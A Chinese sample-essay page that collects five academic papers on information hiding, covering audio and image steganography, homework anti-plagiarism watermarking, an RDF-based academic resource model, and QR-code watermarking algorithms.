隐藏技术论文范文

时间:2023-03-22 12:31:22

隐藏技术论文

隐藏技术论文范文第1篇

1、信息隐藏技术的透明性

信息隐藏的主要目的是让信息透明,将信息嵌入一定的载体中,使得信息无法被第三方识别,就像消失了一样,可以保证信息的安全性。但是信息隐藏技术不但能够将信息隐藏于无形中,还要能将信息恢复,并且恢复后的信息要与隐藏前一致,没有发生任何损失或破坏,保证其信息隐藏前后的完整性。

2、信息隐藏技术的防御攻击性

信息隐藏技术防御攻击的能力一定要很高,因为,网络通信中,信息技术会经常受到有意或无意的攻击,比如删除、非法攻击或篡改等,都会对隐藏的信息造成损害,因此,信息隐藏技术必须具备高的防御能力。此外,网络通信中经常出现信号处理,如调制、有损压缩、滤波等,也会对隐藏的信息造成破坏,所以,为了保障信息的安全,信息隐藏技术一定要拥有更强大的防御攻击的能力。

3、信息隐藏技术的嵌入量大

信息隐藏的目的是为了无法被其他人或电脑发现,为了提高信息隐藏的技术,要将需要隐藏的信息放入一个相对数据量大的载体中,因此,信息隐藏要选择一个信息量大的数据中。此外,还要满足隐藏算法所需要的空间,从而保证信息隐藏的无法识别,保证信息的安全。

4、信息隐藏技术的自我恢复

信息隐藏后一旦需要提取,要能够不需要原始载体信号,便可以从载体中将隐藏的信号提取出来,保证信息的完整。另外,将隐藏的信息提取出来后,要保证信息经过一系列的提取过程后,仍能保证信息的完好无损,有效保证信息的安全性。因此,信息隐藏技术必须要有高度的自我恢复能力。

二、网络通信中信息隐藏的技术途径

1、信息隐藏于音频信号中

将信息隐藏于音频信号中,是将嵌入信息所采用的域为依据,可将语音信息隐藏划分为时域音频隐藏、频域音频隐藏、离散余弦变换域音频隐藏三种。时域音频隐藏技术就是将音频信号的频率、幅度或结果进行处理,然后将其隐藏于音频信号中,是一种简单的隐藏技术。频域音频隐藏技术是将要隐藏的音频文件根据频域的区域进行处理,将需要隐藏的信息以伪噪声的方式嵌于音频信号中,从而达到隐藏的目的,并且很难被识别和发现。离散余弦变化域音频隐藏技术是需要隐藏的信息变换格式,再将变换后的信息嵌于音频信号中,起到深度隐藏的目的。此外,随着网络技术的发展和不断创新,音频信号隐藏还包括小波域隐藏技术和压缩域隐藏技术,效果都很好。

2、信息隐藏于图像信号中

信息隐藏于图像信号中主要有两种方式,一是空间域隐藏技术,就是利用空间替换法,将需要隐藏的信息替换到载体中,并且嵌入不重要的位置,例如将秘密信息嵌入像素点最低的有效位,实现信息的替换,从而保证信息的安全性;二是变换域隐藏技术,就是将需要隐藏的信息转换到变换域范围,变换域是一直在变动的,因此,秘密信息进入变换域后悔进行反复变换,从而使得信息隐匿其中,很难被发现。变换域隐藏技术相比于空间域隐藏技术拥有更好的隐藏效果,并且安全性高、防御攻击力强、自我恢复好,更适合信息的隐藏。

3、信息隐藏于文本信号中

信息隐藏于文本信息中,主要是将信息拆分为极其细碎的结构,然后将每个小部分分别隐藏于文本信息中,从而起到信息隐藏的目的。但是,文本信号需要庞大的数据量才能实现更好的信息隐藏,因此,在实际的应用中,应用率很低。此外,在网络通信中,音频信号隐藏技术和图像信号隐藏技术的隐蔽性远远好于文本信号,所以,文本信号隐藏信息的使用率低;同时,也由于文本信号的防御能力差、自我修复力也差,使得文本信号隐藏信息的安全性降低,不利于信息的隐藏。

三、结束语

网络通信中的信息隐藏技术主要是根据要隐藏信息的类型,将信息隐藏于相应的类型中,例如音频信息隐藏于音频信号中,图像信息隐藏于图像信号中,文本信息隐藏于文本信号中等,都是根据隐藏信息的不同选择合适的隐藏信号,从而保证信息的安全性和提取出来的信息的完整性。

隐藏技术论文范文第2篇

【关键词】信息隐藏 安全 技术

多媒体技术和通信技术带来极大方便,但数字化的多媒体信息很容易受到非法访问、篡改、复制和传播,给人们的生产生活及生命财产带来隐患。魔高一尺道高一丈,信息隐藏技术应运而生。

一、信息隐藏技术及其特征

信息隐藏技术利用载体数据的冗余性以及人的感官局限性,将一个特定信息隐藏在另外一个被称为载体的信息中。信息隐藏技术融合电子工程、计算机科学、信号处理、通信、多媒体技术等多学科,是新兴技术体系。信息隐藏所用载体可以是文本、图像、音频、视频,甚至可以是某个信道或某套编码体制。信息能够隐藏在载体中,载体数据本身具有很大的冗余性,未压缩的多媒体信息编码效率是很低,将某些信息嵌入到该载体信息中进行秘密传送完全可行,不会影响多媒体信息本身的传送和使用;人的感觉器官对于所接收信息都有一定掩蔽效应,如人耳对不同频段声音敏感程度不同,可将信息隐藏到载体中而不被觉察。

信息隐藏技术的特征明显:不可察觉性,嵌入信息后,要求不会引起载体发生可感知变化;不可检测性,嵌入隐藏信息后,计算机不能发现和检测;安全性,嵌入信息后,必须拥有相关信息才能够提取所嵌入内容;纯正性,提取操作时,即便载密文件受到损压缩、解压缩、滤波、转换等扰动,也能提取隐藏信息;稳定性,隐藏信息能“永久”存在;安全性,第三方在不知道隐藏算法和隐藏密钥情况下,不能获取信息相关数据。信息隐藏技术按载体分为,基于文本、图像、音频、视频、超文本、网络层、图形等媒体的信息隐藏技术;按嵌入域分为基于空域(或时域)和变换域的隐藏技术;按嵌入策略分为替换调制、模式调制和扩频叠加调制等技术;按提取要求分为盲隐藏技术和非盲隐藏技术;按作用分为隐蔽通信和数字水印技术;按密钥分为无密钥隐藏和有密钥隐藏。

二、信息隐藏技术的研究及演进

信息安全事关个人利益,也事关国家安全、社会稳定以及经济发展,各国政府无不重视信息和网络安全。密码技术一直是保障信息安全的重要手段,但这并不能解决问题。截获者发现网络文件加密,往往会引起注意,并激发其破解欲望,即使不能成功破解,也能轻易拦截并破坏秘密信息,干扰通信进行。针对密码技术的局限性,上世纪90年代国际上出现了信息隐藏技术(InformationHiding)。

现代信息隐藏研究主要集中在静态图像领域,目前信息隐藏所用载体已扩展到文字、图像、声音及视频等领域。在全球信息化、数字化迅猛发展时代背景下,对知识产权保护、隐密通信等需求激发了对信息隐藏技术的研究热潮。国际上研究信息隐藏的机构主要有剑桥大学、麻省理工学院、NEC美国研究所、IBM研究中心等,已提出了一些优秀隐藏算法。我国于1999年在何德全、周仲义、蔡吉人等三位院士大力倡导下召开了第一届信息隐藏学术研讨会,我国对信息隐藏的研究也取得重要成果。目前在信息隐藏中无论是数字水印还是隐密通信,都得到越来越广泛应用。应用领域不断扩大,从最初静态图片发展到文本、音频、视频、电脑文件、流媒体、网页及网络传输中的数据包,甚至是无线通信领域中的语音通信和手机彩信等领域。我国对信息隐藏的研究取得了很多成果,基本与世界水平保持一致。如今信息隐藏研究已出现百花齐放、百家争鸣局面。

三、信息隐藏技术的应用

随着信息技术飞速发展,人类利用的信息越来越丰富,通信技术发展使人们能够方便、快捷、灵活地使用文本、语音、图像与视频等多种方式通信;各种数字化信息处理技术使得网络中传输任何类型的文件(如文本、图像、音频和视频等)都可被数字化,极大方便了对各种信息数据压缩、存储、复制、处理和利用。

信息隐藏技术主要有隐写术和数字水印。目前,信息隐藏技术的应用主要在以下方面:一是隐密通信。通过隐写术将秘密信息嵌入在公开媒体文件中传播消息。早期的隐密通信,接收方和发送方甚至不必交换电子邮件,直接交互文件或登录特定计算机和账户。随着网络及通信技术发展,隐密通信所用通信方式从简单数据文件交互到互联网以及无线通信领域。二是版权保护。通过数字水印技术在媒体文件中嵌入特定数字标识或签名,标识媒体文件所有权和版权信息等。三是数据完整性保护。防护篡改、完整性保护中所采用的数字水印为易损水印或脆弱水印,任何对媒体文件修改都会从隐藏数据中反映出来。四是印刷品防伪。印刷品印刷之前嵌入一定标识信息,印刷后作品可经过扫描再次输入计算机,通过特定水印提取和鉴别方法来鉴别作品真伪。五是拷贝控制。控制媒体文件拷贝次数,防止大规模盗版或非法复制。

信息隐藏技术重点运用领域是移动通信领域。移动通信网络方便快捷,在军事和商业通信中广泛应用。移动通信领域多媒体短信将文本、图片、音频、视频等组合成多媒体消息进行发送。移动通信领域中多媒体短信以其特有的直观性、生动性和集成性,面市以来得到广泛关注。多媒体短信即彩信的最大特色是支持多媒体功能,可将不同的媒体,如文本、图片、音频、视频等组合在一起进行发送。彩信标准并没有对彩信所支持的文件格式给出具体限制,理论上只要在封装打包时为彩信所包含的各媒体文件设置好适当类型参数即可;但实际上具体的彩信所支持媒体格式还是有限的,这主要与手机终端彩信软件和MMSC支持传送媒体格式有关。随着3G普及以及手机终端行业发展,彩信所支持的媒体文件格式将更丰富多样,为信息隐藏技术在彩信中的应用提供了更为广阔的空间。

【参考文献】

[1]刘宏.信息隐藏技术在遥感影像中的应用.信息工程大学硕士学位论文,2008.

[2]靳冰.信息隐藏在实时视频传输中的应用研究[D].江西理工大学硕士学位论文,2008.

隐藏技术论文范文第3篇

关键词:电子作业;抄袭检查;文档指纹;信息隐藏

中图分类号:TP311 文献标识码:A 文章编号:1009-3044(2012)36-8679-02

随着计算机应用的普及,高校正在逐步实现作业的电子化和网络化。这种作业形式的改革有效减少了教育资源的浪费,减轻了教师的工作任务,提高了学生获得作业批阅结果的效率,教与学得到了互动。应该说作业的电子化是高校教学改革的一种必然趋势,但随之而来的是电子作业抄袭现象严重。学生抄袭作业时,少则部分复制他人文档,调整文档顺序,内容稍做修改;多则大部分甚至全盘拷贝他人文档。学生对于电子作业的抄袭轻松快捷又不易被识别,这就成为作业改革受到严重困扰的主要因素。

在电子作业的反抄袭检查工作上,教师的手工操作既耗时又费力,尤以高校学生人数众多,涉及的教师面而变得局限性很大。那么,建立一种快速、准确、高校的电子作业反抄袭检查模型若能够有效遏制了学生间电子作业相互拷贝,具有十分现实的意义。目的在于能够极大地提高教学的质量和效率,并有力的促进高校的教育改革。在应用领域抄袭检测算法已成为当前研究的热点话题,尤其是在学术论文的剽窃比对上。而我们能够在平时的教学工作中有效地抵制电子作业的抄袭现象,既能真实反映教学效果又能提高学生自主学习的意识和能力。这不仅是对于教学工作的促进更是培养人教育人的有效途径。

1 抄袭检查技术

计算机技术的发展和网络普遍应用,在无意间方便了很多人进行文章抄袭。其实电子作业抄袭现象是国内外的大学广泛存在的现象,为了有力遏制学生的这种不诚信的行为,国外早在20世纪90年代就开始了相应研究。由于西方语系的特点英语是以空格作为单词间隔,因此英语的抄袭检查方法是通过比较关键词来判断相似性的,效率很高。而中文与外文间存在着巨大的差异性, 强调词法与句法,因此关键词比对较不适用于中文。

目前中文的抄袭检查方法主要有基于字符串的匹配、基于统计的中文分词、文档指纹、句子相似度等。

2 电子作业反抄袭检查的实现

该文主要采用两种方法以实现电子作业的反抄袭检查:数字指纹技术和信息隐藏技术。首先吸取了文数字指纹技术的优势并对于指纹技术的算法(Hash函数)做出改进提出一种基于局部词频的指纹算法。其次很多高校特有应用的实验实习电子作业,此时内容都较为相似,所以该文又增加了基于信息隐藏技术的作业反抄袭检查方法,以对于这类电子作业进行有效的比对。

2.1基于局部词频的指纹技术

文档数字指纹技术是依据生成的待比较的文档指纹,通过在样本库中做对比进行抄袭检测。当相匹配指纹数目超过一定值时,可认定存在抄袭行为。为使其具有推广力,一般会引入松弛因子以提高检测的准确性。指纹生成算法是文档数字指纹技术的关键,一般利用 Hash 函数对文档中的特征标记进行计算,获得整数值。一般需要计算函数。

在高校的电子作业中很多都仅是对作业的句子的长度或词语的先后次序作了调整,内容的变化是较小的,用这种方法就会过度精确,用于检查电子作业效率很低。所以该文对这种算法做出一定改进,提出一种基于词频统计的指纹技术。局部词频统计技术借助于向量空间模型来实现。这种向量空间模型是由句子为单位构成的,并对句子进行关键词提取,并对关键词重新排序构建,根据编码与词频共同获取句子的指纹。依据句子的指纹获取文本相似度,具体的算法描述

2.2信息隐藏技术

在高校学生作业有一些是比较特殊的,例如在机房中完成的实验实习类报告,这类作业的特点是内容大致是相同的。可以在作业的源头采用一些基于信息隐藏的嵌入水印算法。在对作业进行片段拷贝时就在源头嵌入水印,能有效的防止拷贝抄袭的现象发生。这样即使电子作业的内容完全相同也能有效的检查到。不能轻易被破坏。这类作业防抄袭检查的水印嵌入既要求字符格式改变不易被擦觉也要兼顾有较大的信息嵌入量,不需太多的字符就能嵌入进机房的机器号及上机完成作业的时间。

由于人眼的视细胞对颜色敏感度的理论指出人眼对绿色最敏感,其次是红色,而对于蓝色是最不敏感的。而计算机的颜色设置理论是数字化的,所以可以对于RGB()的值中低位的值做秘密信息嵌入。可以对R值和G值改变都改变最低的1位bit,而对B值最低的2位bit。这样就对每个电子文档的字符嵌入了4位bit的信息隐藏,并把这4位二进制作为嵌入信息隐藏1Byte的高4位。同时也可以利用字符下划线的B值最低2位bit,G值的最低1位bit,和R值的最低1位bit来隐藏4位信息。这4位bit作为嵌入信息隐藏1Byte的低4位。

在实际操作中程序所嵌入的信息包括程序读取的机器号及上机时间与机房管理系统数据库配合能准确定位学生的学号、姓名、班级等。当学生完成自己的电子作业过程中点击保存、Word程序自动保存、关闭Word文档时都会触发这一嵌入秘密信息的相关程序的运行,可以在全文实现循环嵌入秘密信息的作用。该反抄袭程序是在打开作业文档时自动运行,能自主识别学生作业中具有抄袭嫌疑的片段,协助教师对学生的作业给出客观评价,有效的对这类作业的抄袭起到屏蔽的作用。

3 结束语

在以往的反抄袭检查中主要是通过文档间内容重叠程度或者相似程度来断定的,相关的检查技术也很多也较成熟。但往往面对的是海量数据或是长文档,并需要对文档字符做精确检查。而在教学过程中的电子作业无论在内容、篇幅和数量方面都有很大差别。

该文的创新点是结合了基于局部词频的指纹技术和嵌入水印的信息隐藏技术,提出了一处主要针对高校的作业特点的反抄袭检查的模型。较为全面的考虑到了这类作业不同于学术剽窃的相关问题,所建立的这种快速、准确、高效的电子作业反抄袭检查模型能够在一定程度上遏制学生间电子作业相互拷贝,具有十分现实的意义。

参考文献:

[1] 蒋波.一种基于三重DES和RSA的综合加密方案[J].微计算机信息,2007(18).

[2] 陈国良.并行算法实践[M].北京:高等教育出版社,2004.

[3] 秦玉平,冷强奎,王秀坤,等. 基于局部词频指纹的论文抄袭检测算法[J].计算机工程,2011(6).

[4] 付兵.基于信息隐藏技术的电子作业防抄袭研究[J].微计算机信息,2009(18).

[5] Glatt.Plagiarism screening program[EB/OL].[2008-04-18].www. /screen.id.htm.

隐藏技术论文范文第4篇

关键词:语义Web;RDF;学术资源;本体

中图分类号:TP391文献标识码:A文章编号:1009-3044(2012)09-1985-03

An RDF-based Integration Model of Academic Resources

YAO Jin-feng1, CHEN Lei2

(1.School of Computer Science and Engineering, Anhui University of Science and Technology, Huainan 232001, China; 2.Department of Computer and Information Engineering, Huainan Normal University, Huainan 232038, China)

Abstract: Resources like papers or thesises can be abstraced as knowledge base. After analysed, we find it is appropriate to describe the Web objects of the academic resources using the Resource Description Frame(RDF) statements, and also, we can create the academic ontology with OWL. This paper proposes a mechamism of the semantic query and logical inference, deploys a academic resource knowledge discovery system which has the characters of the Semantic Web, and it will faciliate the user query and the management.

Key words: semantic web; RDF; academic resources; ontology

1概述

对于高校的教师和学生而言,论文之类的学术资源是一种从事学习和科研的重要知识资源,对它们的搜索与发现也是教师和学生的知识获取的重要手段。为了帮助用户的搜索,各高校和一些相关机构都推出了一些论文查询机制(如万方、维普等),极大地方便了相关人群的使用。

论文资源的组织本质上属于知识管理工程。知识管理所关注的是在一个组织中获取、处理和维护知识。对于大型论文资源库而言,有效地进行知识管理,在机构内部实施先进科学的知识组织与维护方式,对外则提供高效、高质量的用户查询(咨询)服务则是相关机构创造新的价值和增强竞争力的有效保证。目前大多数可用信息只具有弱结构组织形式,从知识管理的角度来说,现有技术存在以下诸方面的局限[1]:

1)信息搜索。当今的互联网通常依靠基于关键词的搜索引擎,这使得搜索的结构总是“高匹配、低精度”,而且从搜索结果的形式来看,总是单一的网页,如果所需要的信息分布在不同的文档中,则用户必须给出多个查询来收集相关的页面,然后自己提取这些页面中的相关信息并组织成一个整体。

2)信息抽取。需要人工浏览搜索的文档,当前的信息组织形式还不能满足智能软件(Intelligent Agent)的要求。

3)信息维护。比如术语的不相容性和无法移除过时的信息等。

4)信息挖掘。虽然可以用数据挖掘(Data Mining)等手段提取隐藏在信息数据库中的新知识,但对于分布式的、弱结构化的文档集合,这个任务仍然是困难的。

5)信息视图。经常需要限制某些用户对某些信息的浏览权限。“视图”意味着隐藏某些信息,在传统数据库中很容易做到这一点,但对于论文资源服务网站来说尚难以实现。

基于本体的论文资源语义网的研究的主要目的就是解决上述问题,并借助于自动推理机从给定的知识演绎出一些结论,从而使隐含的知识外显出来,并以期通过相应的(Agent)收集和整理信息,为用户提供备选方案。

2语义Web技术基础

语义Web研究的重点就是如何把信息表示为计算机能够理解和处理的形式,即带有语义。它主要基于XML和RDF/RDFS[2],并在此之上构建本体和逻辑推理规则,它完全基于语义的知识表示和推理,从而能够为计算机所理解和处理。

语义网的核心是本体。R.Studer给本体的定义是“一个本体是一个概念体系(Conceptualization)的显式的形式化规范”[3]。一个典型的本体由有限个术语以及它们之间的关系组成。术语(Term)指给定论域中的重要概念(如对象和类)。例如,以论文资源为例,标题、关键字、主题、作者等,都是术语。本体中概念之间的关系通常包括类的层次结构。除了子类关系外,本体还可以包括以下信息:属性、值约束、不相交描述和对象间逻辑关系的规定等。语义网通过网络本体语言来定义本体,以本体清晰明确地表达各种词汇集和网络上的不同数据资源间的语义关系,从而在网络上实现不同词汇集和数据资源间的共享以及基于网络的语义查询和推理。因此,在Web中,本体提供了对给定领域的一种共识,这种共识对于消除术语差别是必要的。本体尤其可以用于提高网络搜索的精确度,这是因为搜索引擎可以精确地根据本体中的概念查找相关页面,而不是收集所有出现某些关键词的页面,这样就保证了查询的结果。另外,可以利用本体在网络搜索中试探更一般或更特殊的查询。如果一个查询失败了,没有找到相关文档,看见过引擎可以向用户推荐更一般的查询。甚至可以考虑让搜索引擎主动执行这样的查询。

W3C推荐标准是RDF(Resource Description Framework)[2]。它实际上是一个数据模型(Data-Model)。它由一系列陈述(Statement)即“对象-属性-值”三元组,由此,RDF的数据模型可以很方便地描述对象以及它们的关系。实际上,RDF只提供二元谓词(属性)。由于任何复杂的关系都可以分解为多个二元关系,因此RDF的数据模型可以作为其他任何复杂关系模型的基础模型。通过RDF,可以将基于关键词的检索更容易地推进到基于语义的检索。

语义网的基本技术主要包括表示语言(本体开发)、查询语言、转换和推理技术以及相关工具等。其中本体的开发是整个语义网的构建基础,它包括以下一些阶段:确定范围、考虑复用、列举术语、定义分类、定义属性、定义侧面、定义实例和检查异常等。可以充分利用已有的本体或元数据,如都柏林核心元数据(Dublin Core metadata terms)[4]是广为使用的用于资源描述与发现的标准,在利用RDF描述资源时,可以使用其中的一些概念,都柏林核心元数据中典型的概念包括:Title、Creator、Subject等。

从现有知识源(如文本、词典、遗留知识库或本体、数据库模式等)获取领域知识、以(半)自动方式构造或改编本体即所谓的本体学习(ontology learning),是开发本体的有效途径。由河海大学许卓明教授等提出的“从ER模式到OWL DL本体的语义保持的翻译”较好的实现了这一问题,从而使用户可以方便地将ER模式翻译成OWL DL本体[5]。

逻辑推理是语义网的重要内容,根据RDF和RDF Schema建模原语,它所使用的形式语言是谓词逻辑(predicate logic),这通常被认为是所有(基于符号的)知识表示的基础。用逻辑描述RDF和RDFS的语义排除了二义性,并且是机器可读的,同时也为借助逻辑推理机制支持RDF/RDFS的自动推理提供了基础。但是,对于RDF和RDFS而言,它们可以表示某些本体知识,主要建模原主涉及以及类型层次组织起来的词汇,包括子类关系和子属关系、定义域和值域限定以及类实例,然而,还是有很多特性不支持,如属性的局部辖域、类的不相交性、类的布尔组合、基数约束和属性的特殊性质等。为此,在OWL中增加了一些原语以提供更强的表达能力,从而确保OWL的一些子语言(如OWL DL)对应于一个已经得到充分研究的描述逻辑系统。

3基于RDF的学术资源整合模型研究

在对论文资源库进行特点分析后可以发现,论文资源库属于知识库,传统的论文资源基本上有着良好、统一的格式且有着较好的隐藏数据开发潜力,可以在传统数据格式的基础上容易地用XML根据用户自定义的词汇表编写结构化网络文档,再利用RDF编写关于网络对象(论文资源)的简单陈述句,利用OWL语言创作论文资源本体,给出相应的查询和逻辑推理机制,最终将开发出具有新一代网络特征的论文资源语义网络,极大地方便了用户的查询和组织者的管理。

主要任务包括:

1)本体的产生

语义网上存在着各种本体,包括领域本体和全局本体。为了在进行信息检索时有一个较为统一的模式,以便进行语义推理和检索,要求定义全局本体的概念。可以从下几个方面进行定义。

①领域本体:领域本体又称为全局总体,它是对领域知识的明确清晰的表达,通常用本体语言来进行表述。在一些特定的实际应用中,领域本体及领域本体的合成是很有必要的。

②子领域本体:假定领域D能被分成n个子领域,那么领域D的领域本体也可以被分割成n个子领域本体。由于语义网上不同的领域本体通常用各种不同的本体语言来表述,在进行语义网信息检索的时候需要将这些用不同本体语言表述的领域本体转换成统一的形式。转换过程中不可避免地会出现一些信息的丢失,因此,在进行转换的同时,对来自同一个领域的领域本体进行一定的事例,得到新的领域本体。经过转换后的本体就变成了全局本体,也就是用统一的形式表达的各种领域知识集,它能够用更为精确和统一的方式来表达世界的知识集。领域本体转换成全局本体的过程可以通过本体转换工具半自动化地完成。

2)语义推理

推理是指从RDF文档的显式(explicit)知识出发,得到文档中没有显式描述的隐藏(implicit)的知识。在OWL-DL所依赖的描述逻辑中,推理主要分为概念之间的包含推理(subsumption relationship inferences)和实例与类之间的实例推理(instance relationship inferences),可以利用这两种推理在论文资源文档中发现传统搜索搜索不到的隐含信息。在RDFS的推理中,需要在前向链、反向链以及混合方式之间进行选择。前向链将所有数据都交给推理引擎,产生新数据后加入到数据集中;而反向链采用逻辑编程技术,当数据模型接受查询时,将查询翻译成目标,引擎利用反向链规则通过匹配三元组进行目标归结。而混合方式则根据实际情况进行 不同的推理选择。

3)信息检索

与传统的基于SQL的检索方式不同,用户提交的检索形式是语义检索,它有两个目的,一是将用户从具体苛刻的检索关键词中解放出来,用户只需要了解一组与领域词汇相关的本体词条就可以构建成查询语句;第二是可以通过推理查询查询到更加完备的结果。SPARQL[6]查询语言是W3C的推荐标准,它以子图匹配的方式在一组RDF数据集中进行匹配查询。

系统的框架如图1所示。在图1中,用户向系统提交语义查询,系统在已有的语义资源库中进行语义匹配,最终生成查询结果。仍然可以对查询结果进行语义相关性排序,限于篇幅,该文不对此进行研究。

学术资源库主要通过对传统的资源库进行语义转化而得到,这种转换可以是实例的转化,也可以是建立在传统资源库上的虚拟RDF视图[7]。

图1系统结构图

4总结

该文提出一种基于语义Web相关技术的学术资源整合平台模型,它以RDF、OWL本体形式组织学术资源,为用户提供语义查询的结构,通过OWL-DL的内部推理机制,满足用户的推理查询要求,是对传统的查询系统的一种极大的改进。

参考文献:

[1] Antoniou G,Van Harmelen F.A Semantic Web Primer[M].2nd ed.London,Combridge,Massachusettes:The MIT Press,2008.

隐藏技术论文范文第5篇

关键词:QR码;模拟退火算法;链码;水印

1 二维码水印加密背景及目前加密解密现状

1.1 QR二维码的应用背景

随着中国3G技术的普及,以及手机本身性能的提高,二维码作为一种全新的信息存储、传递和识别技术迅速地融入到了社会生活当中,其保密和安全问题也越来越有研究价值,2012年铁道部出现了用户隐私资料信息被二维码泄密的问题,病毒也开始通过二维码传播。目前国内针对二维码数字加密的技术的论述并不多,在当前期刊网上有关二维码讨论的258篇论文也主要集中于二维码自身的编码解码规则,只有16篇是讨论二维码数字手段加密的。其中加密采取的主要手段是通过复杂昂贵的隐形印刷技术。而讨论数字加密的只是对一般图像都通用的结合水印加密,未能很好的结合QR二维码自身的编码规则,所能负载的加密信息量也极少[3]。

1.2 国内外二维码加密研究现状

目前,国内外关于二维码信息隐藏技术的文献不是很多,研究对象主要是四一七条码(Portable Data File417,PDF417码)和QR码。在国内,针对PDF417码的研究较多且以空域水印为主,在国外,以研究QR码居多,以频域水印为主。牛夏牧[7]等利用变形技术对PDF417码中的各组成单元宽度加以适量的变动,采用误差累积的方式实现隐藏信息的嵌入和提取。陈峥等[3]针对PDF417码,提出了基于边界移位的隐藏信息嵌入算法。赵博等[4]提出一种基于结构微调法的水印算法,对PDF417码的组成条空进行适量的微调,将信息隐藏进二维码中。晁玉海等[5]提出一种对隐藏信息进行扩频和映射处理,根据PDF417码自身结构特点,通过微调条码中的条和空将信息隐藏的方法。Ming Sun等[6]提出两种基于离散小波变换(Discrete Wavelet Transform,DWT)变换的QR码数字水印,分别可以嵌入随机序列和图片。Jau-Ji Shen等[7]针对PDF417码提出一种称作关联水印的盲水印算法,该算法可以提高水印的嵌入容量并可将PDF417码用于数据认证。

⑴二维码图和传统防伪制作技术(主要是印刷)相结合,避免码图被直接影印、拍照,比如采用隐形印刷等等;

⑵掌握二维码编码技术,对二维码码图本身做特殊处理(如加密、复合、变形等),这种方法的目的有二,一是可以让别人的识读软件无法识别码图,二是可以在这些码图中编入特别信息,以作防伪校验之用。

简而言之,一个采用特殊印刷技术,一个采用特殊编码,从而提高技术门槛也就提高了造假的成本与难度。本文研究算法基于第二种方式,对二维码码图进行特殊处理,达到嵌入 信息进行防伪校验目的。

2 适用于QR的数字水印算法

2.1 水印的嵌入算法

2.1.1 水印嵌入位置及表示方案

链码和QR二维码水印信息的位置选择和像素值改变方案,根据链码、改进的LSB算法和二维码的基本理论,本文结合处如下表示方案。QR码图像是由N*N个深色或者浅色的模块图形组成,实验中是黑色和白色模块。考虑水印需要的隐蔽性,我们选取黑色的正方形作为水印嵌入单元。假设QR码的一个模块图形的大小为M*M,其中M为模块的长度(高度),单位是像素。条码矩阵的大小为N*N。每个正方形基元占用的像素点为M/N。

如图2.1所示:跟四链码的结合方式为将正方形基元平分成四等份,每一块的大小为M/2N,选择其中的一块,按统一水印规则改变整个选中块的像素值,嵌入水印信息,按照链码方向的规则给四个方向的小矩阵编码为0,1,2,3,四幅图中的红色区域分别对应着0,1,2,3。这样每个黑色QR码的正方形基元便可以承载一位四进制的数。当图像格式为RGB三色图时,结合第一章所介绍的改进的LSB编码规则,每一块像素值按规则改变后又可表示为00,01,10,11的四进制,跟位置的编码规则相结合,每个正方形模块就可以表示一位十六进制的数,也就是4bit的信息。

2.1.2 水.印嵌入流程

如图2.2 水印算法的整体嵌入步骤:

第一步:根据基本信息编码出未加密的二维码举证,自左向右,自上而下,统计N*N黑色和白色模块的QR二维码可用来嵌入水印的黑色模块的个数,记为C,并记录下各个可用的黑色模块在二维码的二维矩阵中的位置。

第二步:依据伪指纹特征随机密钥生成技术,随机生成三个指纹特征数据记为T1、T2、T3,并将T1、T2、T3转码成和水印嵌入方式所采用的编码进制(八进制、十六进制等)相同的编码进制,统计出T1,T2,T3所需要的占用编码位数记为n1,n2,n3。

第三步:如果n1+n2+n3>c,则说明水印嵌入位置不足以嵌入所有的指纹特征数据,当嵌入位置不足时采用基于模拟退火算法竞争机制,解决各个特征信息之间采样数竞争问题,模拟退火的优势能保证了嵌入位置的随机性,和各个特征信息的均衡性。

第四步:依照模拟退火算法竞争机制产生的二维指纹矩阵加密位置对应表,对QR二维码图形进行加密。

2.2 水印的提取算法

如图2.3:首先,从加密的二维码图片中解码出二维码的基本信息。

将加密后的二维码图片记为map1和未水印加密的二维图片记为map2,导入解码程序中。

第二步:将相应的两幅图像做减法代数运算,提取图像中目标区域,给定阈值大小为水印差值的一半,将低于阈值的像素点看作相同像素点,差值取绝对值选取为了实现精确定位,因为两幅图像编码格式一致,除了不通目标区域以外,其他区域完全相同,包括图像大小等。

第三部:使用数学形态学方法,实现断线的连接,主要目的是保持目标区域边缘连续,为孤立点的去除做准备。第三步:使用改进中值滤波去除图像中孤立异常点,如果除了目标区域以外,其他区域完全相同,那么基本不需要去处异常点,在做加入噪声干扰实验时去除边缘毛边是一个需要除了的问题。

第四步:采用曲线全向跟踪技术,寻找目标区域的边缘轮廓,探查到所有目标区域边缘。

第五步:将图像按照二维码自身的编码规则分成N*N块,根据上图中提取去的各个嵌入水印的矩形区域的位置,并将区域大小经过阈值判断,去掉干扰点,定位出各个区域对应得编码值,返回二维矩阵各个嵌入水印值位置对应得值。和加密时候保存的加密二维矩阵值进行对比,进行水印验证。

3 实验

含有水印的QR码的识别和提取实验

算法稳定性实验,流程如下:

(1)产生一段随机长度和随机内容的文本T1。

(2)将文本T1编码为QR码图形Q1。

(3)计算Q1的水印容量大小。

(4)通过通过随机指纹发生器和模拟退火竞争机制产生水印信息W。

(5)向Q1中嵌入水印信息W得到含有水印的QR码图形Q2。

(6)识读Q2得到T2,并与原始编码内容T1对比,记录对比结果。

(7)从含有水印的QR码图形Q2中提取水印信息WR。

(8)比较W和WR,记录对比结果。

(9)重复1000次步骤(1)~(8)的试验,并计算QR码的识别正确率和水印嵌入和提取的正确率。

随机文本T包含英文字母、数字和常用标点符号。重复试验的次数为100次,最后记录实验结果并计算正确率。实验最终得到的数据是QR码的识别正确率为97%,嵌入和提取水印的正确率为95%。该实验表明,水印算法非常稳定,嵌入的水印不会影响到QR码的正确识别,并且水印信息的嵌入和提取不受水印内容和QR码载体图像的影响。

4 结论

提出了一种适用于QR码的鲁棒性和嵌入信息量都适中的水印算法,该算法用链码的方向编码和改进的LSB算法嵌入水印信息,保证水印信息不会改变QR码的图形结构,并确保嵌入的水印信息不会影响到QR码的正确识别。与现有的利用误差特性进行信息隐藏的算法相比,该算法极大程度增强了数字水印的隐蔽性,提高了水印信息的嵌入量。同时算法不会受到QR码的容量限制,并且适合电子保存和打印等多种形式,具有提取水印速度快,抗干扰能力强等优势。并且提出了由多种生物特征提取出的信息组成水印信息的方式,将二维码与用户绑定,实现了人码一体的认证功能。

[参考文献]

[l]何叶.基于二维条码的数字水印技术研究.长沙理工大学硕士学位论文.(2009).

[2]赵博.二维条码研究.西安电子科技大学硕士学位论文.(2007).

[3]纪兴中.基于二维条码技术的数字水印系统研究.浙江工业大学硕士学位论文.(2007).

[4]陈哲,张永林.数字水印技术在二维条码证件防伪中的应用.计算机工程与科学.28(4).42-44.(2006).

[5].二维条码技术应用及标准化状况介绍.中国标准化.5.26-42.(2006).

